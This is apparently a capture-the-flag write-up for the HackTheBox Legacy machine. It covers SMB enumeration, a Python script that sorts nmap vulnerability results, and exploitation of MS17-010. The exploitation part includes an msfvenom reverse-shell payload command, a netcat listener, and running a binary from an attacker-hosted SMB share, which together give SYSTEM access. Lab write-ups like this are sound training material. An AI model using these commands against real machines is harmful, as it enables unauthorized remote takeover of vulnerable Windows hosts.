HackTheBox Legacy Writeup
Enjoy reading my HTB Legacy Writeup
Information Gathering
Let's begin with a basic nmap scan to gather information about the services running on the target machine (sudo is required for the -O OS detection):
sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.4
- Port 139: Microsoft Windows netbios-ssn
- Port 445: Windows XP microsoft-ds
- Port 3389 (closed): ms-wbt-server
Nmap also reported that the SMB service accepts guest logins.
I tried several ways of enumerating the SMB shares, e.g. smbclient
with the -L flag to list all the shares, or smbmap -H 10.10.10.4,
but had no success.
Next, I searched for possible vulnerabilities using nmap in combination with NSE scripts:
nmap --script smb-vuln* -p 139,445 -v 10.10.10.4 -Pn
We got two hits:
- MS08-067 (CVE-2008-4250), a Server service (netapi32) flaw that allows remote code execution
- MS17-010 (CVE-2017-0143), the SMBv1 flaw with a high risk factor that also allows remote code execution
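Running smb-vuln* against a whole subnet produces a lot of script output, and each script reports its result in a slightly different form. The following is an added example (not part of the original writeup) that triages nmap's XML output (-oX) and lists, per host, which CVEs came back VULNERABLE or LIKELY VULNERABLE. The embedded SAMPLE_XML is constructed by hand to mirror the two hits above plus a negative result and a script that emits no table; it is not real scanner output, and the file path argument is an assumption.

```python
"""Triage nmap smb-vuln* results from XML output (nmap -oX).

Added example, not the writeup's own code. Usage:
    nmap --script smb-vuln* -p 139,445 -Pn -oX scan.xml 10.10.10.4
    python3 smb_vuln_triage.py scan.xml
Without an argument it runs against the constructed SAMPLE_XML below.
"""
from __future__ import annotations

import sys
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample, not real scanner output. The shape follows nmap's
# XML schema for NSE results: <script id=...> wrapping one <table> per CVE
# with <elem key=...> entries as written by nmap's vulns library.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <script id="smb-vuln-ms08-067" output="...">
          <table key="CVE-2008-4250">
            <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
            <elem key="state">VULNERABLE</elem>
            <elem key="risk_factor">High</elem>
          </table>
        </script>
        <script id="smb-vuln-ms17-010" output="...">
          <table key="CVE-2017-0143">
            <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
            <elem key="state">VULNERABLE</elem>
            <elem key="risk_factor">HIGH</elem>
          </table>
        </script>
        <script id="smb-vuln-ms10-054" output="false"/>
        <script id="smb-vuln-cve2009-3103" output="...">
          <table key="CVE-2009-3103">
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# States the vulns library uses that mean "worth exploiting". "NOT VULNERABLE"
# and "UNKNOWN (unable to test)" do not start with either prefix.
POSITIVE_STATES = ("VULNERABLE", "LIKELY VULNERABLE")


@dataclass(frozen=True)
class Finding:
    host: str
    port: str
    script: str
    cve: str
    state: str
    risk: str


def is_positive(state: str) -> bool:
    """True for VULNERABLE, VULNERABLE (Exploitable), LIKELY VULNERABLE, ..."""
    return state.strip().upper().startswith(POSITIVE_STATES)


def parse_findings(xml_text: str) -> list[Finding]:
    """Extract every smb-vuln* table (one per CVE) from nmap XML."""
    root = ET.fromstring(xml_text)
    findings: list[Finding] = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr", "?") if addr_el is not None else "?"
        for port in host.iter("port"):
            portid = port.get("portid", "?")
            for script in port.findall("script"):
                sid = script.get("id", "")
                if not sid.startswith("smb-vuln"):
                    continue
                # Scripts that only print "false" carry no <table>; skipped here.
                for table in script.findall("table"):
                    findings.append(Finding(
                        host=addr, port=portid, script=sid,
                        cve=table.get("key", ""),
                        state=table.findtext("elem[@key='state']", default="UNKNOWN"),
                        risk=table.findtext("elem[@key='risk_factor']", default=""),
                    ))
    return findings


def vulnerable_cves(xml_text: str) -> dict[str, list[str]]:
    """Map host address -> sorted CVE ids reported as (likely) vulnerable."""
    hits: dict[str, set[str]] = {}
    for f in parse_findings(xml_text):
        if is_positive(f.state):
            hits.setdefault(f.host, set()).add(f.cve)
    return {host: sorted(cves) for host, cves in hits.items()}


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_XML
    for host, cves in vulnerable_cves(text).items():
        print(f"{host}: {', '.join(cves)}")
```

On the constructed sample this prints the two CVEs for 10.10.10.4 and drops the NOT VULNERABLE entry; the prefix match on the state string is what keeps "VULNERABLE (Exploitable)" and "LIKELY VULNERABLE" in while "NOT VULNERABLE" stays out.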
MS17-010
First, let's create a payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f exe > payload.exe
Start a netcat listener on port 4545 first (nc -lvnp 4545), then use the send_and_execute.py script from this github repo to transfer our payload, execute it and catch the reverse shell on the listener.
Our shell spawns in C:\WINDOWS\system32,
so we probably have high privileges. Unfortunately, we cannot confirm them with whoami,
because whoami.exe is not part of a default Windows XP install (it shipped with the Support Tools and only became a built-in from Vista onwards).
My first idea was to download it with curl, but curl wasn't recognized either.
Next, I tried an SMB share using the smbserver.py script from impacket:
sudo smbserver.py pubshare /home/user/Desktop
This creates a share named pubshare that serves /home/user/Desktop, where I had placed the Windows whoami binary. (Windows XP only speaks SMB1, which impacket's smbserver supports by default, so no -smb2support is needed here.)
Back on the HTB Legacy machine, I executed the binary directly over the UNC path:
\\10.10.16.180\pubshare\whoami.exe
That confirmed that we have NT AUTHORITY\SYSTEM privileges:
C:\WINDOWS\system32>\\10.10.16.180\pubshare\whoami.exe
\\10.10.16.180\pubshare\whoami.exe
NT AUTHORITY\SYSTEM
Obtaining the flags
Navigate to C:\Documents and Settings\john\Desktop
to get the user flag.
The root flag is located in C:\Documents and Settings\Administrator\Desktop.
Tags:
HTB, HackTheBox, Legacy, MS17-010